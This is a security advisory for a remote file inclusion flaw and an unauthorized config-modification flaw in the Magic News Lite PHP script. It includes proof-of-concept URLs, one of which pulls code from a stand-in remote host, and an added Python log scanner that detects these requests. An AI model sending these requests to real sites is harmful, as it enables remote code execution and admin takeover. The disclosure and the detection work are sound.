PHP Exec and Data Modification in Magic News Lite
Summary
- Vulnerability: PHP Exec and Data Modification in Magic News Lite
- Discovered: 2006.02.09
- Last Update: 2006.02.19 Exploitation code published
- ID: EV0072
- CVE: CVE-2006-0723, CVE-2006-0724
- Risk Level: high
- Type: Multiple Vulnerabilities
- Status: Unpatched. No reply from developer(s)
- Vendor: Reamday Enterprises (http://reamdaysoft.com)
- Vulnerable Software: Magic News Lite (http://reamdaysoft.com/customers/magic-news-lite/download.html)
- Version: 1.2.3
- PoC/Exploit: Available
- Solution: Not available
- Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Description
Multiple vulnerabilities were found in the Magic News Lite (http://reamdaysoft.com/customers/magic-news-lite/download.html) script.
1. PHP Code Execution
Vulnerable script: preview.php
The variable $php_script_path is not initialized before it is used in include(), so with register_globals enabled its value can be supplied in the request. This can be used to execute arbitrary PHP code.
Condition: register_globals = ON
2. Unauthorized Data Modification
Vulnerable script: profile.php
The variables $action, $passwd, $admin_password, $new_passwd and $confirm_passwd are not initialized, and their values can be replaced by user-defined data. This can be used to make unauthorized modifications to config.php.
Condition: register_globals = ON
PoC/Exploit
1. PHP Code Execution Example
http://host/path/preview.php?php_script_path=http://remotehost/lib.php
2. Unauthorized Data Modification Example
http://host/path/profile.php?action=change&passwd=1&admin_password=1&new_passwd=new&confirm_passwd=new
Solution
A solution for "PHP Exec and Data Modification in Magic News Lite" is not available. Check the Reamday Enterprises website for updates.
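With no vendor fix available, one way to check whether an installation has received such requests is to search the web server access log for requests to preview.php or profile.php that set the variables named above. The following is an added example, not part of the original advisory or of Magic News Lite; it assumes Combined Log Format, the function names are hypothetical, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request parameters that the advisory says overwrite uninitialized globals
# when register_globals = ON, keyed by the vulnerable script.
WATCHED = {
    "preview.php": {"php_script_path"},
    "profile.php": {"action", "passwd", "admin_password",
                    "new_passwd", "confirm_passwd"},
}

# Assumed Combined Log Format: client ident user [time] "request" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')


def inspect_line(line):
    """Return a finding dict if the request sets a watched variable, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, target, status = m.groups()
    url = urlsplit(target)
    script = url.path.rsplit("/", 1)[-1].lower()
    params = parse_qs(url.query, keep_blank_values=True)
    hits = sorted(WATCHED.get(script, set()) & set(params))
    if not hits:
        return None
    # A scheme in php_script_path means include() was pointed at a remote resource.
    remote = any("://" in v for v in params.get("php_script_path", []))
    return {"client": client, "method": method, "script": script,
            "params": hits, "remote_include": remote, "status": int(status)}


def scan(lines):
    return [f for f in map(inspect_line, lines) if f]


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Feb/2006:10:01:02 +0000] "GET /news/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [19/Feb/2006:10:02:11 +0000] "GET /news/preview.php?php_script_path=http://remotehost/lib.php HTTP/1.1" 200 312',
    '198.51.100.7 - - [19/Feb/2006:10:02:40 +0000] "GET /news/profile.php?action=change&passwd=1&admin_password=1&new_passwd=new&confirm_passwd=new HTTP/1.1" 200 844',
    '192.0.2.10 - - [19/Feb/2006:10:03:00 +0000] "GET /news/preview.php?id=4 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs record only the query string, while register_globals also fills globals from POST data and cookies, so requests that carry these names in a body or cookie will not appear here. Setting register_globals = Off removes the condition both issues depend on.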